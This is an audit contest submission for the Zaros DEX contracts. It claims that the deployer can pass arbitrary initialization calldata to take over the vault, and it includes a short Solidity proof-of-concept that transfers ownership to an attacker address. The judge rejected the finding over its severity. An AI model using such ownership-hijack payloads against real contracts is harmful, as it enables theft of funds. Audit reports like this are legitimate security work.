Part 2
Zaros
PerpetualsDEXFoundrySolidity
70,000 USDC
View results
Previous Next
Submission Details
Severity: high
Invalid

[H-6] Arbitrary Initialization Payloads Allow Deployer Rug-Pull

0xsnoweth

Summary

The InitParams struct allows the deployer to execute arbitrary code during contract creation, enabling instant protocol destruction.

Vulnerability Details

Affected Code:

constructor(InitParams memory initRootUpgrade) {
rootUpgrade.upgrade(
initRootUpgrade.initBranches,
initRootUpgrade.initializables, // Arbitrary addresses
initRootUpgrade.initializePayloads // Arbitrary calldata
);
}

Proof of Concept:

// Malicious Deployer Script
address attacker = 0xBADBAD...;
address[] memory targets = new address[]();
targets[0] = address(vault);
bytes[] memory payloads = new bytes[]();
payloads[0] = abi.encodeWithSignature("transferOwnership(address)", attacker);
RootProxy.InitParams memory params = RootProxy.InitParams({
initBranches: legitimateBranches,
initializables: targets,
initializePayloads: payloads
});
new RootProxy(params); // Ownership transferred to attacker

Exploit Validation:

Deploy with malicious params

Check vault owner: console.log(vault.owner())

Result: 0xBADBAD... (attacker address)

Impact

Immediate Admin Hijacking: Attacker gains protocol control at deployment.

Self-Destruct: Deployer can pass selfdestruct payloads.

Tools Used

Foundry Test: Simulated deployer rug-pull:

Recommendations

// Restrict initializables to known contracts
require(
initializables[i] == address(vault) ||
initializables[i] == address(oracle),
"Unauthorized initialization"
);
Updates

Lead Judging Commences

inallhonesty Lead Judge 10 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!